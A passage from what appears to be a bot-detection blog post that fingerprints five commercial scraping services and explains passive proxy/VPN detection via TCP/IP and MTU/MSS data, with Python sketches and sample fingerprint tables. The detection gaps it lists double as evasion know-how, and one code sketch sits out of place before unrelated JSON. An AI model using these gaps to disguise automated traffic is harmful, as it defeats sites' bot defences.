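<p>The mismatch check itself could look roughly like the following sketch. It assumes that the TCP/IP side yields an average score per operating system class as plain numbers. The names <code>best_tcpip_class</code>, <code>is_suspicious</code> and the <code>min_margin</code> threshold are hypothetical:</p>

```python
def best_tcpip_class(avg_scores, min_margin=1.0):
    """Return the OS class with the highest average score, or None if
    its lead over the runner-up is smaller than min_margin."""
    ranked = sorted(avg_scores.items(), key=lambda item: item[1], reverse=True)
    if not ranked:
        return None
    if len(ranked) > 1 and ranked[0][1] - ranked[1][1] < min_margin:
        return None  # too close to call, do not guess
    return ranked[0][0]


def is_suspicious(claimed_class, avg_scores, min_margin=1.0):
    """Flag a connection only if the TCP/IP class is clear AND disagrees
    with the class claimed in the User-Agent."""
    tcpip_class = best_tcpip_class(avg_scores, min_margin)
    return tcpip_class is not None and tcpip_class != claimed_class


# Made-up scores for a client that claims to be Windows
scores = {"Linux": 8.9, "Windows": 5.1, "macOS": 5.4}
print(is_suspicious("Windows", scores))
```

<p>Requiring a margin between the best and the second-best class keeps ambiguous fingerprints from being flagged.</p>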
<p>In order to be relatively sure that the observed TCP/IP fingerprint does not pertain to one of the above five listed operating system classes, I need to collect as many unique fingerprint samples as possible for each operating system class.</p>
<p>But what happens if the VPN or proxy server dynamically changes its TCP/IP fingerprint?</p>
<p>Indeed, it is very easy to alter the TCP/IP fingerprint on Linux systems. For example, you can change the MSS on a specific route on Linux with the following command:</p>
<div class="highlight"><pre><span></span><code>ip route add <span class="m">11</span>.22.33.44/32 via <span class="m">172</span>.17.0.1 advmss <span class="m">1340</span>
</code></pre></div>
<p>The question however is: How practical is that? Are those proxy/VPN services really gonna alter the TCP/IP fingerprint for every client for which they are routing the traffic based on application layer data? </p>
<p>The proxy/VPN service would have to detect the client's operating system by inspecting the HTTP headers and update the TCP/IP fingerprint accordingly. I don't think this approach is practical.</p>
<h3>Detecting Proxy / VPN connections based on MTU/MSS ratio</h3>
<p><a href="https://ipleak.com/articles/proxy-vpn-detection-passive-fingerprinting">This article</a> suggests detecting proxy / VPN usage by comparing the MTU/MSS ratio of a connection to a standard table of MTU/MSS ratios.</p>
<p>Remember: </p>
<ul>
<li>MTU (Maximum Transmission Unit) is the maximum size of an IP packet including its headers.</li>
<li>MSS (Maximum Segment Size) is the maximum size of the TCP payload in a single segment (excluding the IP and TCP headers).</li>
</ul>
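<p>The relationship between the two values can be sketched as follows, assuming IPv4 and TCP headers of 20 bytes each (no options). The small <code>COMMON_MTUS</code> table only contains illustrative values and is not the table from the linked article:</p>

```python
IPV4_HEADER_BYTES = 20  # assumption: no IP options
TCP_HEADER_BYTES = 20   # assumption: no TCP options

# Illustrative values only, not the table from the linked article.
COMMON_MTUS = {1500: "Ethernet", 1492: "PPPoE"}


def mtu_from_mss(mss):
    """Infer the path MTU from the MSS announced in the SYN packet."""
    return mss + IPV4_HEADER_BYTES + TCP_HEADER_BYTES


def classify_mss(mss):
    """Name the link type for a well-known MTU, otherwise report the
    unusual MTU as a hint that a tunnel might be involved."""
    mtu = mtu_from_mss(mss)
    return COMMON_MTUS.get(mtu, "unusual MTU {}, possibly tunneled".format(mtu))


print(classify_mss(1460))
print(classify_mss(1360))
```

<p>An unusual MTU alone is only a hint, since mobile carriers and some ISPs also use reduced MTU values.</p>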
<p>Protocols such as PPTP, L2TP, or IPsec IKE lower the MTU setting at the network interface (for example, to 1400 for IPsec). By comparing the packet size within an intercepted connection to standard MTU / MSS settings, the use of a proxy or VPN can be detected.</p>Detecting scraping services2021-03-11T22:00:00+01:002021-03-13T18:00:00+01:00Nikolai Tschachertag:incolumitas.com,2021-03-11:/2021/03/11/detecting-scraping-services/<p>In this blog post I will demonstrate how it is possible to detect several scraping services: <a href="https://luminati.io/">luminati.io</a>, <a href="https://scrapingbee.com">ScrapingBee</a>, <a href="https://www.scraperapi.com/">scraperapi.com</a>, <a href="https://scrapingrobot.com">scrapingrobot.com</a>, <a href="https://scrapfly.io">scrapfly.io</a>.</p><p>Many professional scraping services exist that offer data extraction services to their clients. More often than not, those services attempt to camouflage that they are bots. Sometimes even professional services make mistakes though.</p>
<p>My intention with this blog post is not to diminish and look down on the work that those services have put into their products. I just want to demonstrate that there are a plethora of ways to detect the automated nature of their traffic.</p>
<p>In my opinion, <strong>it is much harder to create a stealthy scraping service than to detect it</strong>: For detection, you only need to find one single anomaly. To remain stealthy, you must be perfect. Therefore, a resilient and stealthy scraping service is very hard to find. I hope those services can make use of some of my research provided for free here.</p>
<p><strong>General Strategy</strong>: The bot detection site <a href="https://bot.incolumitas.com">bot.incolumitas.com</a> was used as a scraping target with all scraping services listed below. For <a href="https://luminati.io/">Luminati.io</a> I had to <a href="https://github.com/abrahamjuliot/creepjs">bring out the heavy machinery</a> to detect their <a href="https://luminati.io/products/data-collector">data collector</a> as a bot. I always used the JavaScript rendering option from the scraping services listed below (thus using real browsers).</p>
<h2>TL;DR</h2>
<ol>
<li>
<p><a href="https://luminati.io/">Luminati.io</a>: <code>navigator.platform</code> is <code>Linux x86_64</code> in <a href="https://developer.mozilla.org/en-US/docs/Web/API/Web_Workers_API/Using_web_workers">Web Worker</a> and iframe contexts compared to <code>Win32</code> in the normal <code>window.navigator.platform</code> property. In some cases, the TCP/IP fingerprint doesn't look like a Windows NT 10.0 fingerprint, even though the User-Agent claims it.</p>
</li>
<li>
<p><a href="https://scrapingbee.com">ScrapingBee</a>: The <a href="https://github.com/fingerprintjs/fingerprintjs">browser fingerprint</a> is identical for all their scraping instances. <code>navigator.platform</code> is still set to <code>Linux x86_64</code> although the User-Agent is either Intel Mac OS X or Windows NT.</p>
</li>
<li>
<p><a href="https://www.scraperapi.com/">scraperapi.com</a>: The same issue here, the <a href="https://github.com/fingerprintjs/fingerprintjs">browser fingerprint</a> is identical for all their scrapers. Weird timezone browser settings of <code>Etc/Unknown</code>, strange default screen dimensions, no WebGL vendor or renderer information.</p>
</li>
<li>
<p><a href="https://scrapingrobot.com">scrapingrobot.com</a>: Inconsistent screen dimensions. No plugin information in <code>navigator.plugins</code>. No multimedia devices in <code>navigator.mediaDevices</code>.</p>
</li>
<li>
<p><a href="https://scrapfly.io">scrapfly.io</a>: Inconsistent User-Agent in the HTTP header and in <code>navigator.userAgent</code>. All their scrapers always use the same video card of <em>ANGLE (NVIDIA GeForce GTX 660 Direct3D9Ex vs_3_0 ps_3_0)</em>. No plugin information in <code>navigator.plugins</code>. No multimedia devices in <code>navigator.mediaDevices</code>.</p>
</li>
</ol>
<h2>Detecting <a href="https://luminati.io/">Luminati.io</a></h2>
<p>Luminati is arguably one of the best scraping / proxying services out there, albeit one of the most expensive.</p>
<p>I don't like to admit it, because I don't really dig their <a href="https://documents.trendmicro.com/assets/white_papers/wp-illuminating-holaVPN-and-the-danger-it-poses.pdf">business strategy</a>, but of all the researched scraping businesses, they are by far the best.</p>
<p>I heavily suspect that they actually use the real browsers
from the users that have installed the <a href="https://hola.org/">hola browser extension</a> for scraping. I cannot explain how else they manage to create such a convincingly real browser profile. <strong>Edit: Found some concrete issues that suggest that the above statement is no longer the case</strong>.</p>
<p>For a long time, Luminati only offered proxies, but they started to offer <a href="https://luminati.io/products/data-collector">data extraction tools</a> using real web browsers.</p>
<p>With Luminati, you can use proxies like this:</p>
<div class="highlight"><pre><span></span><code>curl --proxy zproxy.lum-superproxy.io:22225 --proxy-user lum-customer-xxx:yyy <span class="s2">"https://bot.incolumitas.com/"</span>
</code></pre></div>
<p>But we are more interested in their custom data collector which uses a real browser to proxy their requests.</p>
<p>We create the following <a href="https://luminati.io/cp/data_collector/collectors/c_klxn3iw412l3u3v1g1/code">data collector</a>:</p>
<div class="highlight"><pre><span></span><code><span class="nx">navigate</span><span class="p">(</span><span class="s1">'https://bot.incolumitas.com/'</span><span class="p">);</span>
<span class="nx">wait_for_text</span><span class="p">(</span><span class="s1">'#ja3'</span><span class="p">,</span> <span class="s1">'ja3_digest'</span><span class="p">);</span>
<span class="nx">collect</span><span class="p">({</span>
<span class="nx">url</span><span class="o">:</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">});</span>
</code></pre></div>
<p>After scraping the <a href="https://bot.incolumitas.com/">bot detection site</a> a couple of times, these are the fingerprints we managed to obtain:</p>
<table>
<thead>
<tr>
<th>#</th>
<th>ip</th>
<th>user agent</th>
<th>browser fingerprint</th>
<th>ja3 fingerprint</th>
<th>p0f fingerprint</th>
<th>canvas fingerprint</th>
<th>WebGL fingerprint</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>11.22.33.44</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.83 Safari/537.36</td>
<td>ff85adf22012f400f5333f54ffebc916</td>
<td>b32309a26951912be7dba376398abc3b / 7f805430de1e7d98b1de033adb58cf46</td>
<td>Linux 2.2.x-3.x [generic]</td>
<td>DAC6F11B</td>
<td>301740</td>
</tr>
<tr>
<td>2</td>
<td>11.22.33.55</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.83 Safari/537.36</td>
<td>68a9ea61c7ae62f1d9d2c348c1823a2c</td>
<td>b32309a26951912be7dba376398abc3b / 7f805430de1e7d98b1de033adb58cf46</td>
<td>Linux 2.2.x-3.x [generic]</td>
<td>DA9F01B9</td>
<td>301740</td>
</tr>
<tr>
<td>3</td>
<td>11.22.33.66</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36</td>
<td>ffe31d567bd285ba340797681a136cc3</td>
<td>7f805430de1e7d98b1de033adb58cf46 / b32309a26951912be7dba376398abc3b</td>
<td>Linux 2.2.x-3.x [generic]</td>
<td>6CE02F78</td>
<td>301740</td>
</tr>
<tr>
<td>4</td>
<td>11.22.33.77</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36</td>
<td>a00f02fed04ef645c1abb335dfe3e12f</td>
<td>7f805430de1e7d98b1de033adb58cf46 / b32309a26951912be7dba376398abc3b</td>
<td>Linux 2.2.x-3.x [generic]</td>
<td>6FDC3774</td>
<td>301740</td>
</tr>
<tr>
<td>5</td>
<td>11.22.33.88</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36</td>
<td>c0d70db11fc439a78865a0f89f7fa65e</td>
<td>b32309a26951912be7dba376398abc3b / 7f805430de1e7d98b1de033adb58cf46</td>
<td>Windows NT kernel [generic]</td>
<td>D40672D6</td>
<td>301740</td>
</tr>
<tr>
<td>6</td>
<td>11.22.33.99</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36</td>
<td>b631bc196165e8f5931b0388a20eb69f</td>
<td>7f805430de1e7d98b1de033adb58cf46 / b32309a26951912be7dba376398abc3b</td>
<td>Linux 2.2.x-3.x [generic]</td>
<td>5D10FDE8</td>
<td>301740</td>
</tr>
</tbody>
</table>
<p>After a thorough analysis, I have to admit that Luminati.io is doing many things extremely well. </p>
<p>The WebGL fingerprint (which is shortened in the table) is not a useful signal. The fact that it is always identical does not say much: I have the same WebGL fingerprint on my Android phone. The same applies to the TLS fingerprint. There is not enough entropy in this TLS fingerprint to draw any conclusion.</p>
<p>The canvas fingerprint and the browser fingerprint do change with every new scraping instance. Just as expected.</p>
<p>The only curious thing is the Linux OS that was detected by <a href="https://github.com/p0f/p0f">p0f</a>. But I do not trust this OS detection feature from p0f all that much. p0f seems quite old and has not really been maintained for years. It doesn't even detect Linux kernels newer than 3.x versions.</p>
<p>Maybe we have to dig a bit deeper regarding OS fingerprinting on a TCP/IP level.</p>
<p><a href="https://github.com/xnih/satori">Satori.py</a> looks like a good tool for it with an extensive and <a href="https://github.com/xnih/satori/blob/master/fingerprints/tcp.xml">up to date database</a>. It's written in easy to understand Python and this gives me enough freedom to hack my own logic into it if needed. p0f seems a bit more complicated and not so fast for quick changes in comparison.</p>
<p>So the strategy looks like the following:</p>
<ol>
<li>We collect several <a href="https://luminati.io/">Luminati.io</a> TCP/IP network captures and check the RAW TCP/IP signature that we obtain.</li>
<li>Then we check if this signature is inconsistent with the operating system that Luminati claims in its User-Agent.</li>
</ol>
<p>After trying for a bit with <a href="https://github.com/xnih/satori">Satori.py</a> I realized that the tool was a huge mess and I ended up creating <a href="https://github.com/NikolaiT/zardaxt">my own TCP/IP fingerprinting tool</a>.</p>
<p>I compiled my <a href="https://github.com/NikolaiT/zardaxt/blob/master/database.json">own TCP/IP fingerprint database</a> and started to compare the Luminati data collector against it.</p>
<p>In almost all cases I got something like this:</p>
<div class="highlight"><pre><span></span><code>{'score': '9.5/9.5', 'os': 'Windows NT 10.0; Win64; x64'}
</code></pre></div>
<p>Luminati claims in its User-Agent that it is <em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36</em> and in almost all cases, the TCP/IP fingerprint agrees with that.</p>
<p>I had only one case where I got a TCP/IP fingerprint which I could not properly identify.</p>
<div class="highlight"><pre><span></span><code>[{'score': '6/9.5', 'os': 'Macintosh; Intel Mac OS X 11_2_3'}, {'score': '6/9.5', 'os': 'X11; Linux x86_64'}, {'score': '6/9.5', 'os': 'Windows NT 10.0; Win64; x64'}, {'score': '5/9.5', 'os': 'Windows NT 6.1; Win64; x64; rv:87.0'}]
</code></pre></div>
<p>In that case, I have no exact match in my database. So even if Luminati is lying here, Luminati.io bots are detectable with TCP/IP fingerprinting in only 1 out of 10 cases. That is far too weak a signal.</p>
<p>So there must be a good way to detect that the traffic coming from <a href="https://luminati.io/">Luminati.io</a> is not human-generated and thus not organic.</p>
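<p>To separate a clear match from an ambiguous one automatically, the score strings shown above could be parsed as in the following sketch. The helper names and the <code>min_ratio</code> threshold are assumptions for illustration and not part of the fingerprinting tool:</p>

```python
def parse_score(score):
    """Turn a string such as '6/9.5' into a ratio between 0 and 1."""
    achieved, maximum = score.split("/")
    return float(achieved) / float(maximum)


def unambiguous_best_guess(guesses, min_ratio=0.9):
    """Return the single best OS guess, or None if the top score is
    shared by several entries or lies below min_ratio."""
    if not guesses:
        return None
    ratios = [parse_score(guess["score"]) for guess in guesses]
    top = max(ratios)
    winners = [g["os"] for g, ratio in zip(guesses, ratios) if ratio == top]
    if len(winners) != 1 or top < min_ratio:
        return None
    return winners[0]


clear = [{'score': '9.5/9.5', 'os': 'Windows NT 10.0; Win64; x64'}]
unclear = [
    {'score': '6/9.5', 'os': 'Macintosh; Intel Mac OS X 11_2_3'},
    {'score': '6/9.5', 'os': 'X11; Linux x86_64'},
    {'score': '6/9.5', 'os': 'Windows NT 10.0; Win64; x64'},
    {'score': '5/9.5', 'os': 'Windows NT 6.1; Win64; x64; rv:87.0'},
]
print(unambiguous_best_guess(clear))
print(unambiguous_best_guess(unclear))
```

<p>With the two results from above, the first one yields a Windows guess, while the three-way tie in the second one yields no guess at all.</p>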
<p>Of course we could say that the lack of human UI interaction events is suspicious. But their bot only stays on the website for a few seconds. Opening a tab and not interacting with the page could also be the result of human behavior.</p>
<p>Maybe Luminati bot traffic is detectable by measuring latency and RTTs. After all, if my theory is correct, they need to route traffic roughly like this:</p>
<div class="highlight"><pre><span></span><code>[Luminati data collector] => [Luminati hola browser extension user] => [bot.incolumitas.com] => and all the way back.
</code></pre></div>
<p>Maybe this information helps us to do something. However, I don't have a clear plan here.</p>
<p>What else is there to try?</p>
<p>I tried to see what DNS servers the data collectors from <a href="https://luminati.io/">Luminati.io</a> are using:</p>
<div class="highlight"><pre><span></span><code><span class="nx">navigate</span><span class="p">(</span><span class="s1">'https://www.dnsleaktest.com/'</span><span class="p">);</span>
<span class="nx">click</span><span class="p">(</span><span class="s1">'input.standard'</span><span class="p">)</span>
<span class="nx">wait_visible</span><span class="p">(</span><span class="s1">'#results tbody tr:nth-of-type(2)'</span><span class="p">,</span> <span class="p">{</span><span class="nx">timeout</span><span class="o">:</span> <span class="mf">30000</span><span class="p">});</span>
<span class="nx">wait_for_text</span><span class="p">(</span><span class="s1">'th.align-right'</span><span class="p">,</span> <span class="s1">'Country'</span><span class="p">);</span>
<span class="nx">wait_visible</span><span class="p">(</span><span class="s1">'td > img.ispcountry'</span><span class="p">);</span>
<span class="nx">collect</span><span class="p">({</span>
<span class="nx">url</span><span class="o">:</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">});</span>
</code></pre></div>
<p>But it is all perfect:</p>
<figure>
<img src="https://incolumitas.com/images/dnsleakLum.png" alt="DNS Leak" />
<figcaption>Luminati.io data collectors don't leak DNS info<span style="font-size: 60%"></span></figcaption>
</figure>
<p>As a next step, I checked whether the data collectors supported WebSockets:</p>
<div class="highlight"><pre><span></span><code><span class="nx">navigate</span><span class="p">(</span><span class="s1">'https://websocketstest.com/'</span><span class="p">);</span>
<span class="nx">wait_visible</span><span class="p">(</span><span class="s1">'#results_line'</span><span class="p">);</span>
<span class="nx">collect</span><span class="p">({</span>
<span class="nx">url</span><span class="o">:</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">});</span>
</code></pre></div>
<figure>
<img src="https://incolumitas.com/images/webSocketsLum.png" alt="WebSockets Luminati" />
<figcaption>Luminati.io also supports WebSockets<span style="font-size: 60%"></span></figcaption>
</figure>
<h3>Detecting Luminati.io with the help of creepJS</h3>
<p>Now I decided to see what <a href="https://abrahamjuliot.github.io/creepjs/">creepJS</a> would say about the Luminati.io data collectors:</p>
<div class="highlight"><pre><span></span><code><span class="nx">navigate</span><span class="p">(</span><span class="s1">'https://abrahamjuliot.github.io/creepjs/'</span><span class="p">);</span>
<span class="nx">wait_visible</span><span class="p">(</span><span class="s1">'#headless-detection-results'</span><span class="p">);</span>
<span class="nx">wait_for_text</span><span class="p">(</span><span class="s1">'.headless-rating'</span><span class="p">,</span> <span class="s1">'detected'</span><span class="p">);</span>
<span class="nx">wait</span><span class="p">(</span><span class="s1">'#signature-input'</span><span class="p">);</span>
<span class="nx">scroll_to</span><span class="p">(</span><span class="s1">'#fingerprint-data > div:nth-child(13)'</span><span class="p">);</span>
<span class="nx">click</span><span class="p">(</span><span class="s1">'#toggle-open-creep-lies'</span><span class="p">);</span>
<span class="nx">click</span><span class="p">(</span><span class="s1">'#toggle-open-creep-trash'</span><span class="p">);</span>
<span class="nx">collect</span><span class="p">({</span>
<span class="nx">url</span><span class="o">:</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">});</span>
</code></pre></div>
<figure>
<img src="https://incolumitas.com/images/creepjsLum.png" alt="creepjs Luminati" />
<figcaption>creepjs gives Luminati.io data collectors the worst possible rating...<span style="font-size: 60%"></span></figcaption>
</figure>
<p>As you can see, the <a href="https://github.com/abrahamjuliot/creepjs">CreepJS bot detection tool</a> gives Luminati Data Collectors the worst rating possible: <strong>F-</strong></p>
<p>But why exactly?</p>
<p>When digging into the results, I found the following inconsistencies with Web Workers:</p>
<ol>
<li>The Web Workers have an inconsistent <code>navigator.platform</code> compared to the normal <code>navigator.platform</code>. In the Web Worker context, it is set to <code>"platform": "Linux x86_64"</code>.</li>
<li>The property <code>navigator.hardwareConcurrency</code> is 2 compared to 4 in the normal window browser context.</li>
<li>In general: the <code>navigator</code> object in Web Workers differs in many properties from the normal <code>window.navigator</code> object. This should not be the case if the browser has not been tampered with!</li>
</ol>
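<p>On the server side, such inconsistencies could be spotted with a simple comparison. The sketch below assumes that the <code>navigator</code> properties of both contexts were collected in the browser and sent to the server as JSON objects. The function name and the <code>language</code> value are made up for illustration:</p>

```python
def navigator_differences(window_nav, worker_nav):
    """Return {property: (window_value, worker_value)} for every property
    that exists in both contexts but has a different value."""
    shared = sorted(set(window_nav).intersection(worker_nav))
    return {
        key: (window_nav[key], worker_nav[key])
        for key in shared
        if window_nav[key] != worker_nav[key]
    }


window_nav = {"platform": "Win32", "hardwareConcurrency": 4, "language": "en-US"}
worker_nav = {"platform": "Linux x86_64", "hardwareConcurrency": 2, "language": "en-US"}
print(navigator_differences(window_nav, worker_nav))
```

<p>An untampered browser should produce an empty result for properties such as <code>platform</code> and <code>hardwareConcurrency</code>.</p>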
<p>When visiting the <a href="https://abrahamjuliot.github.io/creepjs/tests/workers.html">CreepJS Web Worker detection site</a> with the Luminati Data Collector tool with the following scraping script:</p>
<div class="highlight"><pre><span></span><code><span class="nx">navigate</span><span class="p">(</span><span class="s1">'https://abrahamjuliot.github.io/creepjs/tests/workers.html'</span><span class="p">);</span>
<span class="nx">wait_for_text</span><span class="p">(</span><span class="s1">'#fingerprint-data'</span><span class="p">,</span> <span class="s1">'ua device:'</span><span class="p">);</span>
<span class="nx">scroll_to</span><span class="p">(</span><span class="s1">'#fingerprint-data > div:nth-child(3)'</span><span class="p">);</span>
<span class="nx">collect</span><span class="p">({</span>
<span class="nx">url</span><span class="o">:</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">});</span>
</code></pre></div>
<p>we get the following results:</p>
<figure>
<img src="https://incolumitas.com/images/webworkerLum.png" alt="creepjs Luminati web worker" />
<figcaption>Web Workers leak the true browser behind Luminati data collectors...<span style="font-size: 60%"></span></figcaption>
</figure>
<p>Another issue with the Luminati.io data collector is that it fails to spoof the <code>navigator.platform</code> property in iframes. The corresponding <a href="https://abrahamjuliot.github.io/creepjs/tests/iframes.html">creepJS iframe test</a> illustrates the issue:</p>
<figure>
<img src="https://incolumitas.com/images/iframeLum.png" alt="creepjs Luminati iframe" />
<figcaption>iframes leak the true navigator.platform from Luminati data collectors...<span style="font-size: 60%"></span></figcaption>
</figure>
<p>In conclusion, I can say that Luminati.io is doing a very good job in hiding that their <a href="https://luminati.io/products/data-collector">data collector</a> is an automated bot and not a real human being.</p>
<p>However, they forgot to spoof the <code>navigator.platform</code> property in Web Worker and iframe contexts.</p>
<p>No real Windows 10 Chrome Browser has a <code>navigator.platform</code> of <code>Win32</code> in the normal window object but a value of <code>Linux x86_64</code> in iframes and Web Worker contexts...</p>
<h2>Detecting <a href="https://scrapingbee.com">ScrapingBee</a></h2>
<p>I collected several samples from ScrapingBee. I used the following API call:</p>
<div class="highlight"><pre><span></span><code>curl <span class="s2">"https://app.scrapingbee.com/api/v1/?api_key={API_KEY}&url=https%3A%2F%2Fbot.incolumitas.com%2F&wait=4000&block_ads=false&block_resources=false"</span>
</code></pre></div>
<p>Here are some extracted criteria from the eight samples:</p>
<table>
<thead>
<tr>
<th>#</th>
<th>ip</th>
<th>user agent</th>
<th>browser fingerprint</th>
<th>tls fingerprint</th>
<th>tcp/ip fingerprint</th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>107.152.210.73</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</td>
<td>b11a52c168016c4ba71b5275117ccf27</td>
<td>7f805430de1e7d98b1de033adb58cf46</td>
<td>Linux 3.x [generic]</td>
<td></td>
</tr>
<tr>
<td>2</td>
<td>107.173.246.155</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36</td>
<td>b11a52c168016c4ba71b5275117ccf27</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>Linux 3.x [generic]</td>
<td></td>
</tr>
<tr>
<td>3</td>
<td>209.127.110.235</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36</td>
<td>b11a52c168016c4ba71b5275117ccf27</td>
<td>-</td>
<td>Linux 2.2.x-3.x [generic]</td>
<td></td>
</tr>
<tr>
<td>4</td>
<td>104.144.180.182</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</td>
<td>b11a52c168016c4ba71b5275117ccf27</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>Linux 3.x [generic]</td>
<td></td>
</tr>
<tr>
<td>5</td>
<td>209.127.98.44</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</td>
<td>b11a52c168016c4ba71b5275117ccf27</td>
<td>-</td>
<td>Linux 2.2.x-3.x [generic]</td>
<td></td>
</tr>
<tr>
<td>6</td>
<td>209.127.105.200</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36</td>
<td>b11a52c168016c4ba71b5275117ccf27</td>
<td>-</td>
<td>Linux 2.2.x-3.x [generic]</td>
<td></td>
</tr>
<tr>
<td>7</td>
<td>107.175.157.30</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</td>
<td>b11a52c168016c4ba71b5275117ccf27</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>Linux 3.x [generic]</td>
<td></td>
</tr>
<tr>
<td>8</td>
<td>186.179.14.119</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</td>
<td>b11a52c168016c4ba71b5275117ccf27</td>
<td>-</td>
<td>Linux 3.11 and newer</td>
<td></td>
</tr>
</tbody>
</table>
<p>As you can see, the browser fingerprint is in every case the same: <em>b11a52c168016c4ba71b5275117ccf27</em></p>
<p>This is very bad. This means that any visitor with the above fingerprint can be flagged as a <a href="https://scrapingbee.com">ScrapingBee</a> bot with relatively high likelihood.</p>
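<p>A detection site could find such reused fingerprints by counting the distinct IP addresses per browser fingerprint. The following is a minimal sketch. The function name, the <code>min_ips</code> threshold and the fourth sample are assumptions for illustration:</p>

```python
from collections import defaultdict


def shared_fingerprints(samples, min_ips=3):
    """Return {fingerprint: ip_count} for fingerprints that were seen
    from at least min_ips distinct IP addresses."""
    ips_by_fingerprint = defaultdict(set)
    for ip, fingerprint in samples:
        ips_by_fingerprint[fingerprint].add(ip)
    return {
        fingerprint: len(ips)
        for fingerprint, ips in ips_by_fingerprint.items()
        if len(ips) >= min_ips
    }


samples = [
    ("107.152.210.73", "b11a52c168016c4ba71b5275117ccf27"),
    ("107.173.246.155", "b11a52c168016c4ba71b5275117ccf27"),
    ("209.127.110.235", "b11a52c168016c4ba71b5275117ccf27"),
    # made-up fingerprint of an unrelated visitor
    ("11.22.33.44", "0123456789abcdef0123456789abcdef"),
]
print(shared_fingerprints(samples))
```

<p>Identical fingerprints can also occur legitimately, for example on identical phone models, so such a count is better treated as one signal among several.</p>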
<p>But they made more mistakes:</p>
<p>For example they set the user agent to either </p>
<ol>
<li><em>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</em></li>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36</em></li>
</ol>
<p>but they forgot to spoof the <code>navigator.platform</code> property accordingly. It is still set to <code>"platform": "Linux x86_64"</code>. Obviously, that is very suspicious and would get flagged by many bot detection programs.</p>
<p>One issue could be that their browsers don't seem to support any multimedia devices:</p>
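<p>Such a contradiction is easy to check once both values are available on the server. The sketch below only covers desktop Windows and macOS User-Agents. The mapping and the function name are assumptions for illustration:</p>

```python
# Assumed mapping: User-Agent token -> expected navigator.platform prefix
# (for example "Win32" on Windows and "MacIntel" on macOS).
EXPECTED_PLATFORM_PREFIX = {
    "Windows NT": "Win",
    "Macintosh": "Mac",
}


def platform_contradicts_user_agent(user_agent, platform):
    """True if the User-Agent claims Windows or macOS but
    navigator.platform reports something else."""
    for ua_token, prefix in EXPECTED_PLATFORM_PREFIX.items():
        if ua_token in user_agent:
            return not platform.startswith(prefix)
    return False  # unknown User-Agent, no statement possible


ua = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36")
print(platform_contradicts_user_agent(ua, "Linux x86_64"))
```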
<div class="highlight"><pre><span></span><code><span class="s2">"multimediaDevices"</span><span class="o">:</span> <span class="p">{</span>
<span class="s2">"speakers"</span><span class="o">:</span> <span class="mf">0</span><span class="p">,</span>
<span class="s2">"micros"</span><span class="o">:</span> <span class="mf">0</span><span class="p">,</span>
<span class="s2">"webcams"</span><span class="o">:</span> <span class="mf">0</span>
<span class="p">}</span>
</code></pre></div>
<p>This is very uncommon for normal devices, which usually expose at least one multimedia device.</p>
<h2>Detecting <a href="https://www.scraperapi.com/">scraperapi.com</a></h2>
<p>This is another commercial scraping service. Their scrapers also exhibit some weird behavior.</p>
<p>When scraping with the <a href="https://scraperapi.com">scraperapi.com</a> API five times with the following API call:</p>
<div class="highlight"><pre><span></span><code>curl <span class="s2">"http://api.scraperapi.com/?api_key={{API_KEY}}&url=http://bot.incolumitas.com/&render=true"</span>
</code></pre></div>
<p>we obtain the following fingerprints:</p>
<table>
<thead>
<tr>
<th>#</th>
<th>user agent</th>
<th>browser fingerprint</th>
